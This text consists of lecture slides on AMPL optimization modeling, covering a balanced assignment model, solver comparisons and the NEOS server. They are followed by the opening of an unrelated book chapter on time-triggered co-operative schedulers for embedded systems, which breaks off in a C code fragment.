1, \ldots, G \] each group must be assigned an acceptable number of people Balanced Assignment in AMPL Objective, assignment constraints minimize TotalVariation: sum {k in CATEG, l in TYPES[k]} (MaxType[k,l] - MinType[k,l]); # Total variation over all types subj to AssignAll {i in PEOPLE}: sum {j in 1..numberGrps} Assign[i,j] = 1; # Each person must be assigned to one group subj to GroupSize {j in 1..numberGrps}: minInGrp <= sum {i in PEOPLE} Assign[i,j] <= maxInGrp; # Each group must have an acceptable size \[ g_{\min} \leq \sum_{i \in P} x_{ij} \leq g_{\max}, \text{ for each } j = 1, \ldots, G \] Balanced Assignment Define also \[ Q = \{ i \in P : t_{i,m/f} = \text{female} \} \] Determine \[ z_j \in 
\{0, 1\} = 1 \text{ if any women assigned to group } j \] \[ = 0 \text{ otherwise, for all } j = 1, \ldots, G \] Subject to \[ 2z_j \leq \sum_{i \in Q} x_{ij} \leq |Q| z_j, \text{ for each } j = 1, \ldots, G \] \[ \text{each group must have either} \] \[ \text{no women } (z_j = 0) \text{ or } \geq 2 \text{ women } (z_j = 1) \] Balanced Assignment in AMPL Supplemental constraints \[ \text{set WOMEN = \{i in PEOPLE: type[i,'m/f'] = 'F'\};} \] \[ \text{var WomenInGroup \{j in 1..numberGrps\} binary;} \] \[ \text{subj to Min2WomenInGroupLO \{j in 1..numberGrps\}:} \] \[ 2 \times \text{WomenInGroup}[j] \leq \text{sum \\{i in WOMEN\} Assign[i,j];} \] \[ \text{subj to Min2WomenInGroupUP \{j in 1..numberGrps\}:} \] \[ \text{sum \\{i in WOMEN\} Assign[i,j] \leq \text{card(WOMEN)} \times \text{WomenInGroup}[j];} \] \[2z_j \leq \sum_{i\in Q} x_{ij} \leq |Q| z_j, \text{ for each } j = 1, \ldots, G\] **Balanced Assignment** **Modeling Language Data** 210 people <table> <thead> <tr> <th>PEOPLE :=</th> </tr> </thead> <tbody> <tr> <td>BIW AJH FWI IGN KWR KKI HNN SML RSR TBR</td> </tr> <tr> <td>KRS CAE MPO CAR PSL BGC DJA AJT JPY HWG</td> </tr> <tr> <td>TLR MRL JDS JAE TEN MKA NMA PAS DLD SCG</td> </tr> <tr> <td>VAA FTR GCY OGZ SME KKA MMN API ASA JLN</td> </tr> <tr> <td>JRT SJO WMS RLL WLB SGA MRE SDN HAN JSG</td> </tr> <tr> <td>AMR DHY JMS AGI RHE BLE SMA BAN JAP HER</td> </tr> <tr> <td>MES DHE SWS ACI RHY TWD MAA JFR LHS</td> </tr> <tr> <td>JAD CWU PMY CAH SJH EGR JMQ GGH MMN JWR</td> </tr> <tr> <td>MFR EAZ WAD LVN DHR ABE LSR MTB AJU SAS</td> </tr> <tr> <td>JRS RFS TAR DLT HJO SCR CMY GDE MSL CGS</td> </tr> <tr> <td>HCN JWS RPR RCR RLS DSF MNA MSR PSY MET</td> </tr> <tr> <td>DAN RVY PWS CTS KLN RDN ANV LMN FSM KWN</td> </tr> <tr> <td>CWT PMO EJD AJS SBK JWB SNN PST PSZ AWN</td> </tr> <tr> <td>DCN RGR CPR NHI HKA VMA DMN KRA CSN HRR</td> </tr> <tr> <td>SWR LLR AVI RHA KWW MLE FJL ESO TSY WHF</td> </tr> <tr> <td>TBB FEE MTH RMN WFS CEH SOL ASO MDN RGE</td> </tr> <tr> <td>LVO ADS 
CGH RHD MBM MRH RGF PSA TTI HMG</td> </tr> <tr> <td>ECA CFS MKN SBM RCG JMA EGL UJT ETN GWZ</td> </tr> <tr> <td>MAI DBN HFE PSO APT JMT RJF MRZ MKR XYF</td> </tr> <tr> <td>JCO PSN SCS RDL TMN CGY GMR SER RMS JFN</td> </tr> <tr> <td>DWO REN DGR DET FJT RJZ MBY RSN REZ BLW</td> </tr> </tbody> </table> Balanced Assignment Modeling Language Data 4 categories, 18 types, 12 groups, 16-19 people/group ``` set CATEG := dept loc 'm/f' title ; param type: dept loc 'm/f' title := BIW NNE Peoria M Assistant KRS WSW Springfield F Assistant TLR NNW Peoria F Adjunct VAA NNW Peoria M Deputy JRT NNE Springfield M Deputy AMR SSE Peoria M Deputy MES NNE Peoria M Consultant JAD NNE Peoria M Adjunct MJR NNE Springfield M Assistant JRS NNE Springfield M Assistant HCN SSE Peoria M Deputy DAN NNE Springfield M Adjunct ...... param numberGrps := 12 ; param minInGrp := 16 ; param maxInGrp := 19 ; ``` Model-Based Optimization Balanced Assignment Modeling Language Solution Model + data = problem instance to be solved (CPLEX) ampl: model BalAssign.mod; ampl: data BalAssign.dat; ampl: option solver cplex; ampl: option show_stats 1; ampl: solve; 2568 variables: 2532 binary variables 36 linear variables 678 constraints, all linear; 26328 nonzeros 210 equality constraints 456 inequality constraints 12 range constraints 1 linear objective; 36 nonzeros. CPLEX 12.8.0.0: optimal integer solution; objective 16 115096 MIP simplex iterations 1305 branch-and-bound nodes 10.5 sec Balanced Assignment Modeling Language Solution Model + data = problem instance to be solved (Gurobi) ```ampl ampl: model BalAssign.mod; ampl: data BalAssign.dat; ampl: option solver gurobi; ampl: option show_stats 1; ampl: solve; ``` 2568 variables: - 2532 binary variables - 36 linear variables 678 constraints, all linear; 26328 nonzeros - 210 equality constraints - 456 inequality constraints - 12 range constraints 1 linear objective; 36 nonzeros. 
Gurobi 8.0.0: optimal solution; objective 16 483547 simplex iterations 808 branch-and-cut nodes 108.8 sec Balanced Assignment (logical) Define also \[ Q = \{ i \in P : t_{i,m/f} = \text{female} \} \] Determine \[ z_j \in \{0,1\} = 1 \text{ if any women assigned to group } j \] \[ = 0 \text{ otherwise, for all } j = 1, \ldots, G \] Where \[ z_j = 0 \Rightarrow \sum_{i \in Q} x_{ij} = 0, \] \[ z_j = 1 \Rightarrow \sum_{i \in Q} x_{ij} \geq 2, \text{ for each } j = 1, \ldots, G \] Balanced Assignment in AMPL Supplemental logical constraints ``` set WOMEN = {i in PEOPLE: type[i,'m/f'] = 'F'}; var WomenInGroup {j in 1..numberGrps} binary; subj to Min2WomenInGroup {j in 1..numberGrps}: WomenInGroup[j] = 0 ==> sum {i in WOMEN} Assign[i,j] = 0 else sum {i in WOMEN} Assign[i,j] >= 2; ``` \[ z_j = 0 \Rightarrow \sum_{i \in Q} x_{ij} = 0, \] \[ z_j = 1 \Rightarrow \sum_{i \in Q} x_{ij} \geq 2, \text{ for each } j = 1, \ldots, G \] Balanced Assignment Balanced Assignment in AMPL Send to "linear" solver ampl: model BalAssignWomen.mod ampl: data BalAssign.dat ampl: option solver gurobi; ampl: solve 2568 variables: 2184 binary variables 348 nonlinear variables 36 linear variables 654 algebraic constraints, all linear; 25632 nonzeros 210 equality constraints 432 inequality constraints 12 range constraints 12 logical constraints 1 linear objective; 29 nonzeros. Gurobi 8.0.0: optimal solution; objective 16 265230 simplex iterations 756 branch-and-cut nodes 42.8 sec Balanced Assignment Balanced Assignment in AMPL (refined) Add bounds on variables ```ampl var MinType {k in CATEG, t in TYPES[k]} <= floor (card {i in PEOPLE: type[i,k] = t} / numberGrps); var MaxType {k in CATEG, t in TYPES[k]} >= ceil (card {i in PEOPLE: type[i,k] = t} / numberGrps); ``` ```ampl ampl: solve Presolve eliminates 72 constraints. ... 
Gurobi 8.0.0: optimal solution; objective 16 1617 simplex iterations 1 branch-and-cut nodes 0.16 sec ``` Nonlinear Optimization in AMPL Example: Shekel function Mathematical Formulation Given - \( m \) number of locally optimal points - \( n \) number of variables and - \( a_{ij} \) for each \( i = 1, \ldots, m \) and \( j = 1, \ldots, n \) - \( c_i \) for each \( i = 1, \ldots, m \) Determine - \( x_j \) for each \( j = 1, \ldots, n \) to maximize \[ \sum_{i=1}^{m} \frac{1}{c_i + \sum_{j=1}^{n} (x_j - a_{ij})^2} \] Modeling Language Formulation *Symbolic model (AMPL)* ```AMPL param m integer > 0; param n integer > 0; param a {1..m, 1..n}; param c {1..m}; var x {1..n}; maximize objective: sum {i in 1..m} 1 / (c[i] + sum {j in 1..n} (x[j] - a[i,j])^2); ``` \[ \sum_{i=1}^{m} \frac{1}{c_i + \sum_{j=1}^{n} (x_j - a_{ij})^2} \] Modeling Language Data Explicit data (independent of model) \begin{verbatim} param m := 5 ; param n := 4 ; param a: 1 2 3 4 := 1 4 4 4 4 2 1 1 1 1 3 8 8 8 8 4 6 6 6 6 5 3 7 3 7 ; param c := 1 0.1 2 0.2 3 0.2 4 0.4 5 0.4 ; \end{verbatim} Modeling Language Solution *Model + data = problem instance to be solved* ```ampl ampl: model shekelEX.mod; ampl: data shekelEX.dat; ampl: option solver knitro; ampl: solve; Knitro 10.3.0: Locally optimal solution. objective 5.055197729; feasibility error 0 6 iterations; 9 function evaluations ampl: display x; x [*] := 1 1.00013 2 1.00016 3 1.00013 4 1.00016 ; ``` Modeling Language Solution ... again with multistart option ```ampl ampl: model shekelEX.mod; ampl: data shekelEX.dat; ampl: option solver knitro; ampl: option knitro_options 'ms_enable=1 ms_maxsolves=100'; ampl: solve; Knitro 10.3.0: Locally optimal solution. objective 10.15319968; feasibility error 0 43 iterations; 268 function evaluations ampl: display x; x [*] := 1 4.00004 2 4.00013 3 4.00004 4 4.00013 ;``` Solution (cont’d) ... 
again with a “global” solver ``` ampl: model shekelEX.mod; ampl: data shekelEX.dat; ampl: option solver baron; ampl: solve; BARON 17.10.13 (2017.10.13): 43 iterations, optimal within tolerances. Objective 10.15319968 ampl: display x; x [*] := 1 4.00004 2 4.00013 3 4.00004 4 4.00013 ; ``` Solvers for Model-Based Optimization Off-the-shelf solvers for broad problem classes Three widely used types - “Linear” - “Nonlinear” - “Global” “Linear” Solvers Require objective and constraint coefficients Linear objective and constraints - Continuous variables * Primal simplex, dual simplex, interior-point - Integer (including zero-one) variables * Branch-and-bound + feasibility heuristics + cut generation * Automatic transformations to integer: piecewise-linear, discrete variable domains, indicator constraints * “Callbacks” to permit problem-specific algorithmic extensions Quadratic extensions - Convex elliptic objectives and constraints - Convex conic constraints - Variable × binary in objective * Transformed to linear (or to convex if binary × binary) “Linear” Solvers (cont'd) **CPLEX, Gurobi, Xpress** - Dominant commercial solvers - Similar features - Supported by many modeling systems **SAS Optimization, MATLAB intlinprog** - Components of widely used commercial analytics packages - SAS performance within 2x of the “big three” **MOSEK** - Commercial solver strongest for conic problems **CBC, MIPCL, SCIP** - Fastest noncommercial solvers - Effective alternatives for easy to moderately difficult problems - MIPCL within 7x on some benchmarks “Nonlinear” Solvers Require function and derivative evaluations Continuous variables ▶ Smooth objective and constraint functions ▶ Locally optimal solutions ▶ Variety of methods ✫ Interior-point, sequential quadratic, reduced gradient Extension to integer variables “Nonlinear” Solvers Knitro - Most extensive commercial nonlinear solver - Choice of methods; automatic choice of multiple starting points - Parallel runs and parallel 
computations within methods - Continuous and integer variables CONOPT, LOQO, MINOS, SNOPT - Highly regarded commercial solvers for continuous variables - Implement a variety of methods Bonmin, Ipopt - Highly regarded free solvers - Ipopt for continuous problems via interior-point methods - Bonmin extends to integer variables “Global” Solvers Require expression graphs (or equivalent) Nonlinear + global optimality - Substantially harder than local optimality - Smooth nonlinear objective and constraint functions - Continuous and integer variables BARON - Dominant commercial global solver Couenne - Highly regarded noncommercial global solver LGO - High-quality solutions, may be global - Objective and constraint functions may be nonsmooth Off-the-Shelf Solvers Benchmarks Prof. Hans Mittelmann’s benchmark website DECISION TREE FOR OPTIMIZATION SOFTWARE BENCHMARKS FOR OPTIMIZATION SOFTWARE By Hans Mittelmann (mittelmann at asu.edu) Note that on top of the benchmarks a link to logfiles is given! NOTE ALSO THAT WE DO NOT USE PERFORMANCE PROFILES. 
SEE THIS PAPER WE USE INSTEAD THE SHIFTED GEOMETRIC MEAN **Off-the-Shelf Solvers** **Benchmarks** *By problem type and test set* - **MIXED INTEGER LINEAR PROGRAMMING** - MILP Benchmark - MIPLIB2010 (4-25-2018) - The Solvable MIPLIB Instances (4-28-2018) (MIPLIB2010) - MILP cases that are slightly pathological (4-25-2018) - Feasibility Benchmark (4-25-2018) (MIPLIB2010) - Infeasibility Detection for MILP (4-25-2018) (MIPLIB2010) - **SEMIDEFINITE/SQL PROGRAMMING** - SQL problems from the 7th DIMACS Challenge (8-8-2002) - Several SDP codes on sparse and other SDP problems (1-17 2018) - Infeasible SDP Benchmark (3-9-2018) - Large SOCP Benchmark (4-25-2018) - MISOCP Benchmark (4-25-2018) - **NONLINEAR PROGRAMMING** - AMPL-NLP Benchmark (4-16-2018) Off-the-Shelf Solvers Benchmarks Documentation, summaries, links to detailed results The following codes were run with a limit of 2 hours on the MIPLIB2010 benchmark set with the MIPLIB2010 scripts (exc Matlab) on two platforms. 1/4 threads: Intel i7-4790K, 4 cores, 32GB, 4GHz, available memory 24GB; 12 threads: Intel Xeon X5680, 2x6 cores, 32GB, 3.33GHz, available memory 24GB. These are updated and extended versions of the results produced for the MIPLIB2010 paper. CPLX-12.8.0: CPLEX GUROBI-8.0.0: GUROBI ug(Scip-cplex): 5.0.0: Parallel development version of SCIP (SCIP+CPLEX/SOPLEX on 1 thread) CBC-2.9.8: CBC XPRESS-8.4.0: XPRESS MATLAB-2018a: MATLAB (intlinprog) MIPCL-1.5.1: MIPCL SAS-OR-14.3: SAS Table for single thread. Result files per solver, Log files per solver Table for 4 threads. Result files per solver, Log files per solver Table for 12 threads. Result files per solver, Log files per solver Statistics of the problems can be obtained from the MIPLIB2010 webpage Unscaled and scaled shifted geometric means of run times All non-successes are counted as max-time. The third line lists the number of problems (87 total) solved. Curious? Try Them Out on NEOS! 
NEOS Server: State-of-the-Art Solvers for Numerical Optimization

The NEOS Server is a free Internet-based service for solving numerical optimization problems. Hosted by the Wisconsin Institute for Discovery at the University of Wisconsin in Madison, the NEOS Server provides access to more than 60 state-of-the-art solvers in more than a dozen optimization categories. Solvers hosted by the University of Wisconsin in Madison run on distributed high-performance machines enabled by the HTCondor software; remote solvers run on machines at Arizona State University, the University of Klagenfurt in Austria, and the University of Minho in Portugal.

The NEOS Guide website complements the NEOS Server, showcasing optimization case studies, presenting optimization information and resources, and providing background information on the NEOS Server.

**NEOS Server**

**Solver & Language Listing**

Excerpt from the listing at https://neos-server.org/neos/solvers/, showing the accepted input formats for each solver:

Linear Programming
- Cbc [AMPL Input][GAMS Input][MPS Input]
- CPLEX [AMPL Input][GAMS Input][LP Input][MPS Input][NL Input]
- FICO-Xpress [AMPL Input][GAMS Input][MOSEL Input][MPS Input][NL Input]
- Gurobi [AMPL Input][GAMS Input][LP Input][MPS Input][NL Input]
- MINTO [AMPL Input]
- MOSEK [AMPL Input][GAMS Input][LP Input][MPS Input][NL Input]
- SCIP [AMPL Input][CPLEX Input][GAMS Input][MPS Input][OSIL Input][ZIMPL Input]
- SYMPHONY [MPS Input]

(Similar listings follow for the remaining categories — Mixed Integer Linear Programming, Nonlinearly Constrained Optimization, Mixed Integer Nonlinearly Constrained Optimization, and others — with solvers such as ANTIGONE, CONOPT, filter, Ipopt, Knitro, and LANCELOT.)

About the NEOS Server

Solvers
- 18 categories, 60+ solvers
- Commercial and noncommercial choices
- Almost all of the most popular ones

Inputs
- Modeling languages: AMPL, GAMS, ...
- Lower-level formats: MPS, LP, ...

Interfaces
- Web browser
- Special solver ("Kestrel") for AMPL and GAMS
- Python API

About the NEOS Server (cont'd)

Limits
- 8 hours
- 3 GBytes

Operation
- Requests queued centrally, distributed to various servers for solving
- 650,000+ requests served in the past year, about 1800 per day or 75 per hour
- 17,296 requests on peak day (15 March 2018)

Constraint Programming

Between method-based and model-based
- Relies on solvers
- Focus of the work may be on methods or may be on modeling

Method-based view
- CP solver as a framework for implementation

Model-based view
- CP solver as an alternative solver type

Method-Based vs. Model-Based

Method-based view
- Define global constraints to express the problem
- Implement methods required to use the constraints in the solver
  - Filtering, checking, explanation, counting, reification, . . .
- Program the search procedure for the solver
- Possibly add constraints via restrictions to the search

Model-based view
- Write a model naturally without linearizing
  - Nonlinear operators: min, max, abs
  - Logic operators: and, or, not, if-then
  - Global constraints: alldiff, atleast, atmost
  - Variables as indices
- Send to an off-the-shelf CP solver

CP Approach to Balanced Assignment

Fewer variables with larger domains

```ampl
var Assign {i in PEOPLE, j in 1..numberGrps} binary;
   # Assign[i,j] is 1 if and only if
   # person i is assigned to group j

var Assign {i in PEOPLE} integer >= 1, <= numberGrps;
   # Assign[i] is the group to which i is assigned
```

Balanced Assignment

CP Approach

Global constraint for assignment to groups

```ampl
subj to AssignAll {i in PEOPLE}:
   sum {j in 1..numberGrps} Assign[i,j] = 1;
      # Each person assigned to one group

subj to GroupSize {j in 1..numberGrps}:
   minInGrp <= sum {i in PEOPLE} Assign[i,j] <= maxInGrp;
      # Each group has an acceptable size

subj to GroupSize {j in 1..numberGrps}:
   minInGrp <= numberof j in ({i in PEOPLE} Assign[i]) <= maxInGrp;
      # Each group has an acceptable size
```

Balanced Assignment

CP Approach

Disjunctive constraint for women in a group

```ampl
var WomenInGroup {j in 1..numberGrps} binary;

subj to Min2WomenInGroupLO {j in 1..numberGrps}:
   2 * WomenInGroup[j] <= sum {i in WOMEN} Assign[i,j];

subj to Min2WomenInGroupUP {j in 1..numberGrps}:
   sum {i in WOMEN} Assign[i,j] <= card(WOMEN) * WomenInGroup[j];
      # Number of women in each group is either
      # 0 (WomenInGroup[j] = 0) or >= 2 (WomenInGroup[j] = 1)

subj to Min2WomenInGroup {j in 1..numberGrps}:
   numberof j in ({i in WOMEN} Assign[i]) = 0 or
   numberof j in ({i in WOMEN} Assign[i]) >= 2;
      # Number of women in each group is either 0 or >= 2
```

Balanced Assignment

CP Approach

Solve with IBM ILOG CP

```ampl
ampl:
model BalAssign+CP.mod ampl: data BalAssign.dat ampl: option solver ilogcp; ampl: solve; 246 variables: 36 integer variables 210 nonlinear variables 444 algebraic constraints, all nonlinear; 23112 nonzeros 432 inequality constraints 12 range constraints 12 logical constraints 1 linear objective; 28 nonzeros. ilogcp 12.7.0: optimal solution 512386 choice points, 232919 fails, objective 16 5.3 sec ``` Algebraic Modeling Languages for CP **IBM CPLEX C++ API** - Executable, solver-specific **IBM CPLEX OPL** - Declarative, solver-specific **MiniZinc** - Declarative, solver-independent Summary: Model-Based Optimization Division of labor - Analysts who build symbolic optimization models - Developers who create general-purpose solvers A successful approach across very diverse application areas Modeling languages (like AMPL) bridge the gap between models and solvers - Translate between modeler’s form and algorithm’s form - Maintain independence of model and data - Offer independence of model and data from solver
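The CP modeling style shown above — integer variables whose values are group indices, plus counting constraints such as numberof — can be imitated by a brute-force toy in pure Python. The people and parameters below are invented, and the exhaustive enumeration stands in for what a real CP solver does far more cleverly with propagation and search:

```python
# Brute-force "CP solver" toy: Assign[i] is the group of person i
# (an index variable, CP style). All data here is invented.
from itertools import product

people = ["A", "B", "C", "D", "E", "F"]
women = {"B", "E"}
n_groups, min_in, max_in = 2, 2, 4

def feasible(assign):
    for g in range(n_groups):
        # numberof-style count: how many people land in group g
        size = sum(1 for i in people if assign[i] == g)
        if not (min_in <= size <= max_in):
            return False
        # each group must have either no women or at least 2
        w = sum(1 for i in women if assign[i] == g)
        if w == 1:
            return False
    return True

solutions = [dict(zip(people, groups))
             for groups in product(range(n_groups), repeat=len(people))
             if feasible(dict(zip(people, groups)))]
print(len(solutions), "feasible assignments")
```

Note how the model reads directly off the problem statement — no binary linearization, no big-M coefficients — which is the point of the model-based CP view.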
1. Introduction

An embedded system is a special-purpose computer system designed to perform a small number of dedicated functions for a specific application (Sachitanand, 2002; Kamal, 2003). Examples of applications using embedded systems are: microwave ovens, TVs, VCRs, DVDs, mobile phones, MP3 players, washing machines, air conditioners, handheld calculators, printers, digital watches, digital cameras, automatic teller machines (ATMs) and medical equipment (Barr, 1999; Bolton, 2000; Fisher et al., 2004; Pop et al., 2004). Besides these applications, which can be viewed as "non-critical" systems, embedded technology has also been used to develop "safety-critical" systems, where failures can have very serious impacts on human safety. Examples include aerospace, automotive, railway, military and medical applications (Redmill, 1992; Profeta et al., 1996; Storey, 1996; Konrad et al., 2004). The use of embedded systems in safety-critical applications requires that the system operate in real time to achieve correct functionality and/or avoid any possibility of detrimental consequences. Real-time behavior can only be achieved if the system is able to perform predictable and deterministic processing (Stankovic, 1988; Pont, 2001; Buttazzo, 2005; Phatrapornnant, 2007).
As a result, the correct behavior of a real-time system depends on the time at which its results are produced as well as on the logical correctness of those results (Avrunin et al., 1998; Kopetz, 1997). In real-time embedded applications, it is important to predict the timing behavior of the system to guarantee that the system will behave correctly and, consequently, that the lives of the people using the system will be protected. Hence, predictability is the key characteristic in real-time embedded systems. Embedded systems engineers are concerned with all aspects of the system development, including hardware and software engineering. Therefore, activities such as specification, design, implementation, validation, deployment and maintenance will all be involved in the development of an embedded application (Fig. 1). A design of any system usually starts with ideas in people's minds. These ideas need to be captured in requirements specification documents that specify the basic functions and the desirable features of the system. The system design process then determines how these functions can be provided by the system components. Fig. 1. The system development life cycle (Nahas, 2008). For a successful design, the system requirements have to be expressed and documented in a very clear way. Inevitably, there can be numerous ways in which the requirements for a simple system can be described. Once the system requirements have been clearly defined and well documented, the first step in the design process is to design the overall system architecture. The architecture of a system basically represents an overview of the system components (i.e. sub-systems) and the interrelationships between these different components. Once the software architecture is identified, the process of implementing that architecture should take place. This can be achieved using a lower-level system representation such as an operating system or a scheduler.
A scheduler is a very simple operating system for an embedded application (Pont, 2001). Building the scheduler requires a scheduling algorithm, which simply provides the set of rules that determine the order in which the tasks will be executed by the scheduler during the system operating time. It is therefore the most important factor influencing predictability in the system, as it is responsible for satisfying timing and resource requirements (Buttazzo, 2005). However, the actual implementation of the scheduling algorithm on the embedded microcontroller also has an important role in determining the functional and temporal behavior of the embedded system. This chapter is mainly concerned with so-called "Time-Triggered Co-operative" (TTC) schedulers and how such algorithms can be implemented in highly-predictable, resource-constrained embedded applications. The layout of the chapter is as follows. Section 2 provides a detailed comparison between the two key software architectures used in the design of real-time embedded systems, namely "time-triggered" and "event-triggered". Section 3 introduces and compares the two best-known scheduling policies, "co-operative" and "pre-emptive", and highlights the advantages of co-operative over pre-emptive scheduling. Section 4 discusses the relationship between scheduling algorithms and scheduler implementations in practical embedded systems. In Section 5, the Time-Triggered Co-operative (TTC) scheduling algorithm is introduced in detail, with a particular focus on its strengths and drawbacks and how such drawbacks can be addressed to maintain its reliability and predictability attributes. Section 6 discusses the sources and impact of timing jitter in the TTC scheduling algorithm. Section 7 describes various possible ways in which the TTC scheduling algorithm can be implemented on resource-constrained embedded systems that require highly-predictable system behavior.
In Section 8, the various scheduler implementations are compared and contrasted in terms of jitter characteristics, error handling capabilities and resource requirements. The overall chapter conclusions are presented in Section 9.

2. Software architectures of embedded systems

Embedded systems are composed of hardware and software components. The success of an embedded design thus depends on the right selection of the hardware platform(s) as well as the software environment used in conjunction with the hardware. The selection of the hardware and software architectures of an application must take place at early stages in the development process (typically at the design phase). Hardware architecture relates mainly to the type of processor (or microcontroller) platform(s) used and the structure of the various hardware components that are comprised in the system: see Mwelwa (2006) for further discussion of hardware architectures for embedded systems. Provided that the hardware architecture is decided, an embedded application requires an appropriate form of software architecture to be implemented. To determine the most appropriate choice of software architecture for a particular system, this condition must be fulfilled (Locke, 1992): "The [software] architecture must be capable of providing a provable prediction of the ability of the application design to meet all of its time constraints." Since embedded systems are usually implemented as collections of real-time tasks, the various possible system architectures may then be determined by the characteristics of these tasks. In general, there are two main software architectures which are typically used in the design of embedded systems: Event-triggered (ET): tasks are invoked as a response to aperiodic events.
In this case, the system takes no account of time: instead, the system is controlled purely by the response to external events, typically represented by interrupts which can arrive at any time (Bannatyne, 1998; Kopetz, 1991b). Generally, an ET solution is recommended for applications in which sporadic data messages (with unknown request times) are exchanged in the system (Hsieh and Hsu, 2005). Time-triggered (TT): tasks are invoked periodically at specific time intervals which are known in advance. The system is usually driven by a global clock which is linked to a hardware timer that overflows at specific time instants to generate periodic interrupts (Bennett, 1994). In distributed systems, where a multi-processor hardware architecture is used, the global clock is distributed across the network (via the communication medium) to synchronise the local time base of all processors. In such architectures, the time-triggering mechanism is based on time-division multiple access (TDMA), in which each processor-node is allocated a periodic time slot to broadcast its periodic messages (Kopetz, 1991b). A TT solution can suit many control applications where the data messages exchanged in the system are periodic (Kopetz, 1997). Many researchers argue that ET architectures are highly flexible and can provide high resource efficiency (Obermaisser, 2004; Locke, 1992). However, ET architectures allow several interrupts to arrive at the same time, where these interrupts might indicate (for example) that two different faults have been detected at the same time. Inevitably, dealing with an occurrence of several events at the same time will increase the system complexity and reduce the ability to predict the behavior of the ET system (Scheler and Schröder-Preikschat, 2006). In more severe circumstances, the system may fail completely if it is heavily loaded with events that occur at once (Marti, 2002).
In contrast, using TT architectures helps to ensure that only a single event is handled at a time and therefore the behavior of the system can be highly-predictable. Since highly-predictable system behavior is an important design requirement for many embedded systems, TT software architectures have become the subject of considerable attention (e.g. see Kopetz, 1997). In particular, it has been widely accepted that TT architectures are a good match for many safety-critical applications, since they can help to improve the overall safety and reliability (Allworth, 1981; Storey, 1996; Nissanke, 1997; Bates, 2000; Obermaisser, 2004). Liu (2000) highlights that TT systems are easy to validate, test, and certify because the times related to the tasks are deterministic. Detailed comparisons between the TT and ET concepts were performed by Kopetz (1991a and 1991b).

3. Schedulers and scheduling algorithms

Most embedded systems involve several tasks that share the system resources and communicate with one another and/or the environment in which they operate. For many projects, a key challenge is to work out how to schedule tasks so that they can meet their timing constraints. This process requires an appropriate form of scheduler (1). A scheduler can be viewed as a very simple operating system which calls tasks periodically (or aperiodically) during the system operating time. Moreover, as with desktop operating systems, a scheduler has the responsibility to manage the computational and data resources in order to meet all temporal and functional requirements of the system (Mwelwa, 2006). According to the nature of the operating tasks, any real-time scheduler must fall under one of the following types of scheduling policies: **Pre-emptive scheduling:** where multi-tasking is allowed. In more detail, a task with higher priority is allowed to pre-empt (i.e. interrupt) any lower priority task that is currently running.
The lower priority task will resume once the higher priority task finishes executing. For example, suppose that – over a particular period of time – a system needs to execute four tasks (Task A, Task B, Task C, Task D) as illustrated in Fig. 2.

Fig. 2. A schematic representation of four tasks which need to be scheduled for execution on a single-processor embedded system (Nahas, 2008).

Assuming a single-processor system is used, Task C and Task D can run as required, but Task B is due to execute before Task A is complete. Since no more than one task can run at the same time on a single processor, Task A or Task B has to relinquish control of the CPU.

(1) Note that schedulers represent the core components of "Real-Time Operating System" (RTOS) kernels. Examples of commercial RTOSs in use today are: VxWorks (from Wind River), Lynx (from LynxWorks), RTLinux (from FSMLabs), eCos (from Red Hat), and QNX (from QNX Software Systems). Most of these operating systems require a large amount of computational and memory resources which are not readily available in low-cost microcontrollers like the ones targeted in this work.

In pre-emptive scheduling, a higher priority might be assigned to Task B, with the consequence that – when Task B is due to run – Task A will be interrupted, Task B will run, and Task A will then resume and complete (Fig. 3). Co-operative (or "non-pre-emptive") scheduling: where only single-tasking is allowed. In more detail, if a higher priority task is ready to run while a lower priority task is running, the former task cannot be released until the latter one completes its execution. For example, assume the same set of tasks illustrated in Fig. 2. In the simplest solution, Task A and Task B can be scheduled co-operatively.
In these circumstances, the task which is currently using the CPU is implicitly assigned a high priority: any other task must therefore wait until this task relinquishes control before it can execute. In this case, Task A will complete and then Task B will be executed (Fig. 4). Hybrid scheduling: where limited, but efficient, multi-tasking capabilities are provided (Pont, 2001). That is, only one task in the whole system is set to be pre-emptive (this task is best viewed as the "highest-priority" task), while the other tasks run co-operatively (Fig. 5). In the example shown in the figure, suppose that Task B is a short task which has to execute immediately when it arrives. In this case, Task B is set to be pre-emptive so that it acquires CPU control to execute whenever it arrives, whether or not another task is running. Overall, when comparing co-operative with pre-emptive schedulers, many researchers have argued that co-operative schedulers have many desirable features, particularly for use in safety-related systems (Allworth, 1981; Ward, 1991; Nissanke, 1997; Bates, 2000; Pont, 2001). For example, Bates (2000) identified the following four advantages of co-operative scheduling over pre-emptive alternatives: the scheduler is simpler; the overheads are reduced; testing is easier; and certification authorities tend to support this form of scheduling. Similarly, Nissanke (1997) noted: "[Pre-emptive] schedules carry greater runtime overheads because of the need for context switching - storage and retrieval of partially computed results. [Co-operative] algorithms do not incur such overheads. Other advantages of co-operative algorithms include their better understandability, greater predictability, ease of testing and their inherent capability for guaranteeing exclusive access to any shared resource or data." Many researchers still, however, believe that pre-emptive approaches are more effective than co-operative alternatives (Allworth, 1981; Cooling, 1991).
This can be due to different reasons. As noted in Pont (2001), one of the reasons why pre-emptive approaches are more widely discussed and considered is confusion over the options available. Pont gave the example that basic cyclic scheduling, which is often discussed as an alternative to pre-emption, is not representative of the wide range of co-operative scheduling architectures that are available. Moreover, one of the main issues that concerns people about the reliability of co-operative scheduling is that long tasks can have a negative impact on the responsiveness of the system. This is clearly underlined by Allworth (1981): "[The] main drawback with this co-operative approach is that while the current process is running, the system is not responsive to changes in the environment. Therefore, system processes must be extremely brief if the real-time response [of the] system is not to be impaired." However, in many practical embedded systems, the process (task) duration is extremely short. For example, the calculations of one quite complicated algorithm, the "proportional-integral-derivative" (PID) controller, can be carried out on the most basic (8-bit) 8051 microcontroller in around 0.4 ms: this imposes an insignificant processor load in most systems – including flight control – where a 10 ms sampling rate is adequate (Pont, 2001). Pont has also commented that if a system is designed to run long tasks, "this is often because the developer is unaware of some simple techniques that can be used to break down these tasks in an appropriate way and – in effect – convert long tasks called infrequently into short tasks called frequently": some of these techniques are introduced and discussed in Pont (2001). Moreover, if the performance of the system seems slightly poor, it is often advisable to upgrade the microcontroller hardware rather than to use a more complex software architecture.
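The long-task-splitting technique mentioned above can be sketched as a "multi-stage" task: each call performs only a short slice of the work and records its progress in static state, so the scheduler regains control quickly between slices. The sketch below is hypothetical (the buffer-summing job, `SLICE_LEN` and the function name are invented for illustration, not taken from the chapter):

```c
#include <assert.h>
#include <stdbool.h>

/* A long job (summing a large buffer) recast as a multi-stage task.
 * Each invocation processes at most SLICE_LEN elements, so the task
 * stays brief and other tasks are not blocked for long. */
#define DATA_LEN   1000
#define SLICE_LEN  100          /* elements processed per invocation */

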